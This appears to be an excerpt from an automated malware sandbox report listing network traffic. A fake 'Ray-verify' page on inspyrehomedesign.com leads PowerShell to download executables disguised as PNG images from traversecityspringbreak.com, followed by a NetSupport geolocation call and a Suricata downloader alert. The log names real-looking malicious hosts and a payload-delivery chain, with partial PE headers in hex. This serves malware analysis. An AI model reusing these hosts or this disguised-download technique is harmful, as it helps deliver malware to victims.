                                  Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 28 Oct 2024 18:46:25 GMT Content-Type: image/png Content-Length: 396664 Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT Connection: keep-alive ETag: "6716045f-60d78" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 88 e0 14 d6 cc 81 7a 85 cc 81 7a 85 cc 81 7a 85 a3 f7 d1 85 c9 81 7a 85 d7 1c e4 85 d4 81 7a 85 c5 f9 e9 85 c7 81 7a 85 cc 81 7b 85 59 81 7a 85 d7 1c d0 85 4b 81 7a 85 d7 1c d1 85 f7 81 7a 85 d7 1c e1 85 cd 81 7a 85 d7 1c e0 85 cd 81 7a 85 d7 1c e7 85 cd 81 7a 85 52 69 63 68 cc 81 7a 85 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 3f 58 56 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 c6 04 00 00 1a 01 00 00 00 00 00 f7 da 02 00 00 10 00 00 00 e0 04 00 00 00 15 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 06 00 00 04 00 00 27 cb 06 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 8c 05 00 6f 03 00 00 54 80 05 00 78 00 00 00 00 30 06 00 40 06 00 00 00 00 00 00 00 00 00 00 00 e4 05 00 78 29 00 00 00 40 06 00 5c 45 00 00 b0 e2 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 64 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc c5 04 00 00 10 00 00 00 c6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2f b0 00 00 00 e0 04 00 00 b2 00 00 00 ca 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 82 00 00 00 a0 05 00 00 18 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 06 00 00 00 30 06 00 00 08 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 46 00 00 00 40 06 00 00 48 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficTCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Mon, 28 Oct 2024 18:46:19 GMTContent-Type: image/pngContent-Length: 18808Last-Modified: Mon, 21 Oct 2024 07:35:56 GMTConnection: keep-aliveETag: "6716045c-4978"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 73 76 0a bb 37 17 64 e8 37 17 64 e8 37 17 64 e8 2c 8a f8 e8 35 17 64 e8 2c 8a ce e8 34 17 64 e8 3e 6f f7 e8 30 17 64 e8 37 17 65 e8 0f 17 64 e8 2c 8a ca e8 33 17 64 e8 2c 8a ff e8 36 17 64 e8 2c 8a fe e8 36 17 64 e8 2c 8a f9 e8 36 17 64 e8 52 69 63 68 37 17 64 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 88 bb 55 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 06 00 00 00 16 00 00 00 00 00 00 a0 10 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 00 00 00 04 00 00 b8 de 00 00 02 00 40 05 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 22 00 00 61 00 00 00 b8 20 00 00 50 00 00 00 00 40 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 20 00 00 78 29 00 00 00 50 00 00 84 00 00 00 40 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 04 00 00 00 10 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1b 03 00 00 00 20 00 00 00 04 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 04 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 0d 00 00 00 40 00 00 00 0e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 01 00 00 00 50 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Mon, 28 Oct 2024 18:46:25 GMTContent-Type: image/pngContent-Length: 77280Last-Modified: Mon, 21 Oct 2024 07:35:58 GMTConnection: keep-aliveETag: "6716045e-12de0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 cb 8f 56 23 aa e1 05 23 aa e1 05 23 aa e1 05 4c dc 7f 05 32 aa e1 05 2a d2 72 05 26 aa e1 05 23 aa e0 05 74 aa e1 05 4c dc 4b 05 75 aa e1 05 4c dc 4a 05 3e aa e1 05 4c dc 7b 05 22 aa e1 05 4c dc 7c 05 22 aa e1 05 52 69 63 68 23 aa e1 05 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 17 6f 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 82 00 00 00 4a 00 00 00 00 00 00 b4 21 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 01 00 00 04 00 00 51 1b 02 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 bd 00 00 3c 00 00 00 00 00 01 00 38 06 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 e0 5d 00 00 00 10 01 00 88 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ba 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 de 80 00 00 00 10 00 00 00 82 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c 25 00 00 00 a0 00 00 00 26 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2d 00 00 00 d0 00 00 00 0e 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 06 00 00 00 00 01 00 00 08 00 00 00 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 70 0c 00 00 00 10 01 00 00 0e 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Mon, 28 Oct 2024 18:46:25 GMTContent-Type: image/pngContent-Length: 396664Last-Modified: Mon, 21 Oct 2024 07:35:59 GMTConnection: keep-aliveETag: "6716045f-60d78"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 88 e0 14 d6 cc 81 7a 85 cc 81 7a 85 cc 81 7a 85 a3 f7 d1 85 c9 81 7a 85 d7 1c e4 85 d4 81 7a 85 c5 f9 e9 85 c7 81 7a 85 cc 81 7b 85 59 81 7a 85 d7 1c d0 85 4b 81 7a 85 d7 1c d1 85 f7 81 7a 85 d7 1c e1 85 cd 81 7a 85 d7 1c e0 85 cd 81 7a 85 d7 1c e7 85 cd 81 7a 85 52 69 63 68 cc 81 7a 85 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 3f 58 56 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 c6 04 00 00 1a 01 00 00 00 00 00 f7 da 02 00 00 10 00 00 00 e0 04 00 00 00 15 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 06 00 00 04 00 00 27 cb 06 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 8c 05 00 6f 03 00 00 54 80 05 00 78 00 00 00 00 30 06 00 40 06 00 00 00 00 00 00 00 00 00 00 00 e4 05 00 78 29 00 00 00 40 06 00 5c 45 00 00 b0 e2 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 64 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc c5 04 00 00 10 00 00 00 c6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2f b0 00 00 00 e0 04 00 00 b2 00 00 00 ca 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 82 00 00 00 a0 05 00 00 18 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 06 00 00 00 30 06 00 00 08 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 46 00 00 00 40 06 00 00 48 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: GET /o/o.png HTTP/1.1Host: traversecityspringbreak.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49726 -> 166.1.160.211:80
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                                  Source: global trafficHTTP traffic detected: GET /Ray-verify.html HTTP/1.1Host: inspyrehomedesign.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: inspyrehomedesign.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://inspyrehomedesign.com/Ray-verify.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: inspyrehomedesign.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /t8b1Qdw/1q.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://inspyrehomedesign.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /t8b1Qdw/1q.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                  Source: global trafficHTTP traffic detected: GET /Ray-verify.html HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: inspyrehomedesign.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /o/o.png HTTP/1.1Host: traversecityspringbreak.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /o/1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/2.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/3.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/4.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/5.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/6.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/7.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/8.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/9.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/10.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/11.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /o/12.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: traversecityspringbreak.com
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficDNS traffic detected: DNS query: inspyrehomedesign.com
                                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                                  Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
                                  Source: global trafficDNS traffic detected: DNS query: i.ibb.co
